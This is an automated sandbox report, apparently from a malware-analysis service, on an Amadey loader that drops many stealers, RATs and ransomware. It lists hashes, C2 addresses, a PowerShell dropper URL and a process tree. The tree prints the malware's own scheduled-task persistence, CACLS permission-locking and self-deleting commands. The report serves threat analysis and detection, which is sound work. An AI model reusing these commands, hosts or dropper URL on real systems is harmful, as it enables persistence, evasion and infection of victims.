amadey | 7ec0d3e3dc4222f34c482926ce1f971b51929e95b9d097140bc1f4b1c84dafd9

Analysis

max time kernel
10s
max time network
605s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
08/09/2023, 21:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

fd3f7d8082b7cddb0e20ad1e8fd5d285
SHA1

ff51a1c5cab13afe0178163b2b9d60e49c799b74
SHA256

7ec0d3e3dc4222f34c482926ce1f971b51929e95b9d097140bc1f4b1c84dafd9
SHA512

166a2e743346bd5016b36278fb4bae0a96f86ce920ebae777baada95be887b679f5360de914c0563828dc2eadf2c091564c9f5cb05de32bd7f3b252a6f53deaa
SSDEEP

48:6AtGt28lK9iqmcfaFXfkeLJhyPFlWa8tYb/IL/cpwOulavTqXSfbNtm:RIUiqtaJkeqDUtfcpmsvNzNt

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://80.66.79.27/o.png

Extracted

Family

aurora

212.87.204.93:8081

Extracted

Family

statusrecorder

185.106.94.73

Extracted

Family

formbook

Version

4.1

Campaign

sy22

Decoy

vinteligencia.com

displayfridges.fun

completetip.com

giallozafferrano.com

jizihao1.com

mysticheightstrail.com

fourseasonslb.com

kjnala.shop

mosiacwall.com

vandistreet.com

gracefullytouchedartistry.com

hbiwhwr.shop

mfmz.net

hrmbrillianz.com

funwarsztat.com

polewithcandy.com

ourrajasthan.com

wilhouettteamerica.com

johnnystintshop.com

asgnelwin.com

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Gurcu Stealer V3 payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0006000000022a2e-7750.dat	family_gurcu_v3

Detects Healer an antivirus disabler dropper 1 IoCs

resource	yara_rule
behavioral1/memory/5000-203-0x0000000000400000-0x000000000040A000-memory.dmp	healer

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Healer
Healer an antivirus disabler dropper.
dropper healer
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1512	2736	schtasks.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	448	2736	schtasks.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	16140	2736	schtasks.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	14056	2736	schtasks.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8272	2736	schtasks.exe	75

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/4804-193-0x0000000000E50000-0x0000000000ED4000-memory.dmp	family_redline
behavioral1/files/0x000600000001af89-186.dat	family_redline
behavioral1/files/0x000600000001af89-185.dat	family_redline

Status Recorder Stealer
Status Recorder is a crypto stealer written in C++.
stealer statusrecorder

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000500000002228d-6883.dat	dcrat

Formbook payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/5456-342-0x00000000001D0000-0x00000000001FF000-memory.dmp	formbook
behavioral1/memory/5504-613-0x0000000002500000-0x000000000252F000-memory.dmp	formbook

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 9 IoCs

pid	Process
236	Black_Saturn.exe
2524	Jakugym.exe
1408	GoogleUpdate.exe
1320	iexpress.exe
2508	ECheck.exe
2728	VCheck.exe
4068	LiveUpdate.exe
3428	verify.exe
4020	1iexpress.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
9740	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.159.66.125

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 17 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
213	ipinfo.io
412	api.ipify.org
878	api.2ip.ua
8	ip-api.com
89	api.ipify.org
288	api.myip.com
292	ipinfo.io
509	ipinfo.io
662	ip-api.com
754	api.2ip.ua
755	api.2ip.ua
90	api.ipify.org
214	ipinfo.io
289	api.myip.com
291	ipinfo.io
1002	api.2ip.ua
511	ipinfo.io

Launches sc.exe 40 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
14900	sc.exe
1612	sc.exe
9888	sc.exe
5224	sc.exe
6796	sc.exe
7176	sc.exe
14772	sc.exe
13692	sc.exe
16332	sc.exe
7944	sc.exe
7380	sc.exe
3584	sc.exe
11436	sc.exe
14584	sc.exe
5992	sc.exe
5480	sc.exe
8824	sc.exe
17004	sc.exe
6056	sc.exe
6052	sc.exe
4984	sc.exe
9840	sc.exe
6124	sc.exe
5876	sc.exe
6696	sc.exe
7104	sc.exe
8628	sc.exe
4744	sc.exe
13756	sc.exe
13672	sc.exe
8556	sc.exe
6148	sc.exe
6136	sc.exe
4992	sc.exe
6988	sc.exe
9612	sc.exe
6172	sc.exe
6784	sc.exe
6752	sc.exe
9544	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000600000001b0b1-1979.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
2944	5116	WerFault.exe	91
5080	2092	WerFault.exe	97
1540	336	WerFault.exe	96
5952	5300	WerFault.exe	149
852	5432	WerFault.exe	152
5824	3416	WerFault.exe	198
5296	6400	WerFault.exe	248
12164	9716	WerFault.exe	393
13700	12608	WerFault.exe	415
14196	6860	WerFault.exe	333
5656	8404	WerFault.exe	350
13848	9924	WerFault.exe	353

NSIS installer 1 IoCs

installer

resource	yara_rule
behavioral1/files/0x000600000001afe3-767.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4964	schtasks.exe
7916	schtasks.exe
15500	schtasks.exe
8648	schtasks.exe
2544	schtasks.exe
7592	schtasks.exe
8184	schtasks.exe
11388	schtasks.exe
5328	schtasks.exe
720	schtasks.exe
15408	schtasks.exe
16140	schtasks.exe
6308	schtasks.exe
14056	schtasks.exe
1512	schtasks.exe
5912	schtasks.exe
448	schtasks.exe
7340	schtasks.exe
5228	schtasks.exe
8272	schtasks.exe
6384	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1684	timeout.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3416	NETSTAT.EXE
5484	NETSTAT.EXE

Runs net.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
5932	PING.EXE
5572	PING.EXE
11100	PING.EXE
4692	PING.EXE
3420	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1408	GoogleUpdate.exe
1408	GoogleUpdate.exe
4068	powershell.exe
4068	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4272	a.exe
Token: SeDebugPrivilege	2524	Jakugym.exe
Token: SeDebugPrivilege	1408	GoogleUpdate.exe
Token: SeDebugPrivilege	4068	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4272 wrote to memory of 236	4272	a.exe	71
PID 4272 wrote to memory of 236	4272	a.exe	71
PID 4272 wrote to memory of 236	4272	a.exe	71
PID 4272 wrote to memory of 2524	4272	a.exe	72
PID 4272 wrote to memory of 2524	4272	a.exe	72
PID 4272 wrote to memory of 1408	4272	a.exe	73
PID 4272 wrote to memory of 1408	4272	a.exe	73
PID 4272 wrote to memory of 1408	4272	a.exe	73
PID 4272 wrote to memory of 1320	4272	a.exe	74
PID 4272 wrote to memory of 1320	4272	a.exe	74
PID 4272 wrote to memory of 2508	4272	a.exe	76
PID 4272 wrote to memory of 2508	4272	a.exe	76
PID 4272 wrote to memory of 2728	4272	a.exe	77
PID 4272 wrote to memory of 2728	4272	a.exe	77
PID 4272 wrote to memory of 4068	4272	a.exe	78
PID 4272 wrote to memory of 4068	4272	a.exe	78
PID 4272 wrote to memory of 4068	4272	a.exe	78
PID 4272 wrote to memory of 3428	4272	a.exe	79
PID 4272 wrote to memory of 3428	4272	a.exe	79
PID 4272 wrote to memory of 4020	4272	a.exe	80
PID 4272 wrote to memory of 4020	4272	a.exe	80
PID 4272 wrote to memory of 4020	4272	a.exe	80

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4272
- C:\Users\Admin\AppData\Local\Temp\a\Black_Saturn.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Black_Saturn.exe"
  2⤵
  - Executes dropped EXE
  PID:236
- C:\Users\Admin\AppData\Local\Temp\a\Jakugym.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Jakugym.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdate.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- - C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdate.exe"
    3⤵
    PID:3372
- C:\Users\Admin\AppData\Local\Temp\a\iexpress.exe
  "C:\Users\Admin\AppData\Local\Temp\a\iexpress.exe"
  2⤵
  - Executes dropped EXE
  PID:1320
- C:\Users\Admin\AppData\Local\Temp\a\ECheck.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ECheck.exe"
  2⤵
  - Executes dropped EXE
  PID:2508
- C:\Users\Admin\AppData\Local\Temp\a\VCheck.exe
  "C:\Users\Admin\AppData\Local\Temp\a\VCheck.exe"
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\Users\Admin\AppData\Local\Temp\a\LiveUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\a\LiveUpdate.exe"
  2⤵
  - Executes dropped EXE
  PID:4068
- - C:\Users\Admin\AppData\Local\Temp\a\LiveUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\a\LiveUpdate.exe"
    3⤵
    PID:5136
- C:\Users\Admin\AppData\Local\Temp\a\verify.exe
  "C:\Users\Admin\AppData\Local\Temp\a\verify.exe"
  2⤵
  - Executes dropped EXE
  PID:3428
- C:\Users\Admin\AppData\Local\Temp\a\1iexpress.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1iexpress.exe"
  2⤵
  - Executes dropped EXE
  PID:4020
- - C:\Users\Admin\AppData\Local\Temp\a\1iexpress.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1iexpress.exe"
    3⤵
    PID:7116
- C:\Users\Admin\AppData\Local\Temp\a\XCheck.exe
  "C:\Users\Admin\AppData\Local\Temp\a\XCheck.exe"
  2⤵
  PID:2180
- C:\Users\Admin\AppData\Local\Temp\a\2023.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2023.exe.exe"
  2⤵
  PID:4340
- C:\Users\Admin\AppData\Local\Temp\a\ts.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ts.exe"
  2⤵
  PID:4472
- C:\Users\Admin\AppData\Local\Temp\a\w.exe
  "C:\Users\Admin\AppData\Local\Temp\a\w.exe"
  2⤵
  PID:4436
- - C:\Users\Admin\AppData\Roaming\bitcoin-22.0-win64-setup.exe
    "C:\Users\Admin\AppData\Roaming\bitcoin-22.0-win64-setup.exe" 0
    3⤵
    PID:4692
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" C:\Program Files\Bitcoin\bitcoin-qt.exe
      4⤵
      PID:5468
- - C:\Users\Admin\AppData\Roaming\electrum-4.3.4-setup.exe
    "C:\Users\Admin\AppData\Roaming\electrum-4.3.4-setup.exe" 0
    3⤵
    PID:5080
- C:\Users\Admin\AppData\Local\Temp\a\susan.exe
  "C:\Users\Admin\AppData\Local\Temp\a\susan.exe"
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /s 1RPGFZw.aKC
    3⤵
    PID:548
- C:\Users\Admin\AppData\Local\Temp\a\windowsystem.exe
  "C:\Users\Admin\AppData\Local\Temp\a\windowsystem.exe"
  2⤵
  PID:168
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RF6tg7YH.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RF6tg7YH.exe"
    3⤵
    PID:2116
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "RF6tg7YH" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RF6tg7YH.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe"
      4⤵
      PID:620
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4976
    - - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:5932
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "RF6tg7YH" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:5328
    - - C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe
        
        "C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe"
        5⤵
        
        PID:11636
- C:\Users\Admin\AppData\Local\Temp\a\Setup1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Setup1234.exe"
  2⤵
  PID:3996
- - C:\Users\Admin\AppData\Local\Temp\a\Setup1234.exe
    C:\Users\Admin\AppData\Local\Temp\a\Setup1234.exe
    3⤵
    PID:5116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 760
      4⤵
      Program crash
      PID:2944
- - C:\Users\Admin\AppData\Local\Temp\a\Setup1234.exe
    C:\Users\Admin\AppData\Local\Temp\a\Setup1234.exe
    3⤵
    PID:336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 336 -s 760
      4⤵
      Program crash
      PID:1540
- C:\Users\Admin\AppData\Local\Temp\a\167.exe
  "C:\Users\Admin\AppData\Local\Temp\a\167.exe"
  2⤵
  PID:4268
- C:\Users\Admin\AppData\Local\Temp\a\lega.exe
  "C:\Users\Admin\AppData\Local\Temp\a\lega.exe"
  2⤵
  PID:1780
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z7213621.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z7213621.exe
    3⤵
    PID:1300
- C:\Users\Admin\AppData\Local\Temp\a\SusanoFortniteCheats.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SusanoFortniteCheats.exe"
  2⤵
  PID:4804
- C:\Users\Admin\AppData\Local\Temp\a\ChromeSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ChromeSetup.exe"
  2⤵
  PID:5132
- - C:\Users\Admin\AppData\Local\Temp\fzfyx.exe
    "C:\Users\Admin\AppData\Local\Temp\fzfyx.exe"
    3⤵
    PID:5288
  - - C:\Users\Admin\AppData\Local\Temp\fzfyx.exe
      "C:\Users\Admin\AppData\Local\Temp\fzfyx.exe"
      4⤵
      PID:5456
- C:\Users\Admin\AppData\Local\Temp\a\keninv.exe
  "C:\Users\Admin\AppData\Local\Temp\a\keninv.exe"
  2⤵
  PID:5184
- - C:\Users\Admin\AppData\Local\Temp\a\keninv.exe
    "C:\Users\Admin\AppData\Local\Temp\a\keninv.exe"
    3⤵
    PID:5144
- C:\Users\Admin\AppData\Local\Temp\a\kenpol.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kenpol.exe"
  2⤵
  PID:5272
- - C:\Users\Admin\AppData\Local\Temp\a\kenpol.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kenpol.exe"
    3⤵
    PID:2496
- - C:\Users\Admin\AppData\Local\Temp\a\kenpol.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kenpol.exe"
    3⤵
    PID:1140
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  PID:5764
- C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
  2⤵
  PID:5300
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 1312
    3⤵
    - Program crash
    PID:5952
- C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
  2⤵
  PID:5412
- - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
    3⤵
    PID:732
- C:\Users\Admin\AppData\Local\Temp\a\jeffzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\jeffzx.exe"
  2⤵
  PID:5432
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 1312
    3⤵
    - Program crash
    PID:852
- C:\Users\Admin\AppData\Local\Temp\a\lada.exe
  "C:\Users\Admin\AppData\Local\Temp\a\lada.exe"
  2⤵
  PID:6100
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe"
    3⤵
    PID:5632
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explonde.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:2544
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explonde.exe" /P "Admin:N"&&CACLS "explonde.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:2540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:6016
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explonde.exe" /P "Admin:N"
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explonde.exe" /P "Admin:R" /E
        5⤵
        
        PID:2128
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1080
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:2892
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:1952
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      PID:2036
- C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
  2⤵
  PID:5664
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:1436
- C:\Users\Admin\AppData\Local\Temp\a\calc2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\calc2.exe"
  2⤵
  PID:5868
- C:\Users\Admin\AppData\Local\Temp\a\ss41.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ss41.exe"
  2⤵
  PID:6112
- C:\Users\Admin\AppData\Local\Temp\a\Meduza1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Meduza1234.exe"
  2⤵
  PID:4724
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a\Meduza1234.exe"
    3⤵
    PID:3848
  - - C:\Windows\system32\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      Runs ping.exe
      PID:5572
- C:\Users\Admin\AppData\Local\Temp\a\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DCRatBuild.exe"
  2⤵
  PID:4712
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\webRef\M7YOpcqxG4OzvHNUqrw0u9NFHo55vp.vbe"
    3⤵
    PID:5408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\webRef\HY354z.bat" "
      4⤵
      PID:6076
    - - C:\webRef\agentnet.exe
        
        "C:\webRef\agentnet.exe"
        5⤵
        
        PID:4280
- C:\Users\Admin\AppData\Local\Temp\a\gqnz5n3uw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\gqnz5n3uw.exe"
  2⤵
  PID:4524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3912
- C:\Users\Admin\AppData\Local\Temp\a\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\a\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  PID:4704
- C:\Users\Admin\AppData\Local\Temp\a\dollzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dollzx.exe"
  2⤵
  PID:3812
- - C:\Users\Admin\AppData\Local\Temp\a\dollzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dollzx.exe"
    3⤵
    PID:9868
- C:\Users\Admin\AppData\Local\Temp\a\clips.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clips.exe"
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s468.0.bat" "
    3⤵
    PID:10740
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1684
  - - C:\ProgramData\presepuesto\LEAJ.exe
      "C:\ProgramData\presepuesto\LEAJ.exe"
      4⤵
      PID:8088
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
        5⤵
        Creates scheduled task(s)
        
        PID:11388
- C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
  2⤵
  PID:5852
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:10232
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:7136
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "NTFS Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB910.tmp"
      4⤵
      Creates scheduled task(s)
      PID:15408
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "NTFS Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD4C7.tmp"
      4⤵
      Creates scheduled task(s)
      PID:5912
- C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe
  "C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe"
  2⤵
  PID:4420
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN 55aa5e.exe /TR "C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:6384
- C:\Users\Admin\AppData\Local\Temp\a\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
  2⤵
  PID:5836
- C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
  2⤵
  PID:5528
- - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
    3⤵
    PID:7816
- - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
    3⤵
    PID:7852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
      4⤵
      PID:8604
    - - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:11100
- C:\Users\Admin\AppData\Local\Temp\a\sicilyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sicilyzx.exe"
  2⤵
  PID:2168
- - C:\Users\Admin\AppData\Local\Temp\a\sicilyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sicilyzx.exe"
    3⤵
    PID:8156
- C:\Users\Admin\AppData\Local\Temp\a\Services.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Services.exe"
  2⤵
  PID:1512
- - C:\Users\Admin\Documents\_CwcdSDRtSLXNhsm6ayYfXNB.exe
    "C:\Users\Admin\Documents\_CwcdSDRtSLXNhsm6ayYfXNB.exe"
    3⤵
    PID:7292
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7916
- C:\Users\Admin\AppData\Local\Temp\a\BLTOOLSV5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BLTOOLSV5.exe"
  2⤵
  PID:6152
- C:\Users\Admin\AppData\Local\Temp\a\file.exe
  "C:\Users\Admin\AppData\Local\Temp\a\file.exe"
  2⤵
  PID:5232
- C:\Users\Admin\AppData\Local\Temp\a\crypted158.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted158.exe"
  2⤵
  PID:6400
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:15788
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 132
    3⤵
    - Program crash
    PID:5296
- C:\Users\Admin\AppData\Local\Temp\a\DCRatBuild3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DCRatBuild3.exe"
  2⤵
  PID:9808
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Msprovidernet\2Yxdw1MawZ014bavclpLQBkjfQrL.vbe"
    3⤵
    PID:14856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Msprovidernet\cMkFIYJMzWWv4A.bat" "
      4⤵
      PID:6156
    - - C:\Msprovidernet\ComReview.exe
        
        "C:\Msprovidernet\ComReview.exe"
        5⤵
        
        PID:9404
- C:\Users\Admin\AppData\Local\Temp\a\SubsoiledEstranger_2023-09-05_01-39.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SubsoiledEstranger_2023-09-05_01-39.exe"
  2⤵
  PID:10224
- C:\Users\Admin\AppData\Local\Temp\a\6606.exe
